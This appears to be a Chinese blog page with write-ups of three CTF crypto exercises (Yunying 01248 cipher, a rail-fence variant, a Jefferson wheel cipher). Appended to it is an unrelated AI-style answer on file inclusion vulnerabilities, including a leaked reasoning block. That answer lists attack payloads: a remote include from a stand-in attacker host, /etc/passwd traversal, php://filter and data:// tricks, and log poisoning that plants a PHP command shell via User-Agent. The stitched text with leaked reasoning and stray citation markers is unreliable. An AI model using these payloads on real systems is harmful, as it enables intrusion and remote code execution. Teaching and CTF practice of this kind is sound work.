攻防世界练习题

本文深入探讨了多种密码学加密技巧,包括云影加密、Railfence变种及转轮机加密,通过实例解析,揭示了传统加密方法的现代应用与破解思路。
幂数加密

最近在攻防世界里面写了一题,叫幂数加密,我就搜索学习了一边幂数加密,例如E是第五个字母5=20+22 所以E加密过之后是02;O是第十五个15=20+21+22+23所以O加密后是0123。
一打开题目:88421012204802244040142242024 80122。傻了。哪来的8嘛。后来了解到了一种加密方式叫云影加密。云影密码是01248密码,与二进制幂加密不同,这个加密法采用的是0作间隔,其他非0数隔开后组合起来相加表示序号1-26之一的字母,例如18 = 1+8 = 9 = I,1248 = 1+2+4+8 = 15 = O这样。

特点:密文中仅存在01248,加密对象仅有字母。

所以答案就出来了。
题目:8842101220480224404014224202480122
改一下:88421/122/48/2244/4/142242/248/122
加一下:23/5/12/12/4/15/14/5
换字母:W/E/L/L/D/O/N/E
所以flag是cyberpeace{WELLDONE}。

Railfence

这是个奇葩类型,用常规工具从2试到20 都不对,但一看就感觉应该是栅栏密码啊。后来查到了一个特殊的栅栏密码叫做WWW的变种
例如:密文为1 2 3 4 5 6 key=3 Rail-fence Cipher

1 . . . 5 . ↘        ↗ ↘
. 2 . 4 . 6  ↘     ↗
. . 3 . . .    ↘ ↗

结果为 1 5 2 4 6 3
长见识了。
附解密网站:http://www.atoolbox.net/Tool.php?Id=777

转轮机加密

题目:
1: < ZWAXJGDLUBVIQHKYPNTCRMOSFE <
2: < KPBELNACZDTRXMJQOYHGVSFUWI <
3: < BDMAIZVRNSJUWFHTEQGYXPLOCK <
4: < RPLNDVHGFCUKTEBSXQYIZMJWAO <
5: < IHFRLABEUOTSGJVDKCPMNZQWXY <
6: < AMKGHIWPNYCJBFZDRUSLOQXVET <
7: < GWTHSPYBXIZULVKMRAFDCEONJQ <
8: < NOZUTWDCVRJLXKISEFAPMYGHBQ <
9: < XPLTDSRFHENYVUBMCQWAOIKZGJ <
10: < UDNAJFBOWTGVRSCZQKELMXYIHP <
11: < MNBVCXZQWERTPOIUYALSKDJFHG <
12: < LVNCMXZPQOWEIURYTASBKJDFHG <
13: < JZQAWSXCDERFVBGTYHNUMKILOP <

密钥为:2,3,7,5,13,12,9,1,8,10,4,11,6
密文为:NFQKSEVOQOFNP
这个他有提示:托马斯·杰斐逊
所以直接搜索到了杰斐逊转轮密码。按照这个密码体系来就好了,第二行放到第一栏,第三行放到第二栏,以此类推。得到下表。
在这里插入图片描述然后把重新排序后的表的排头按密文排列,像这样:在这里插入图片描述
然后为了方便,将每一竖列写出来,因为题目要求小写字母提交,所以我誊的时候就将它转化成了小写字母,如下:
在这里插入图片描述
可以看出唯一一个有意义的是第18个,提交就好了,本题不需要格式,提交小写字母串即可。

本题没有多大难度,就是有耐心即可。

本周总结:不要轻信标题,要保持耐心,多学学传统题型的变种,出题人喜欢变种。
<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界(XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界(XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** - 低安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值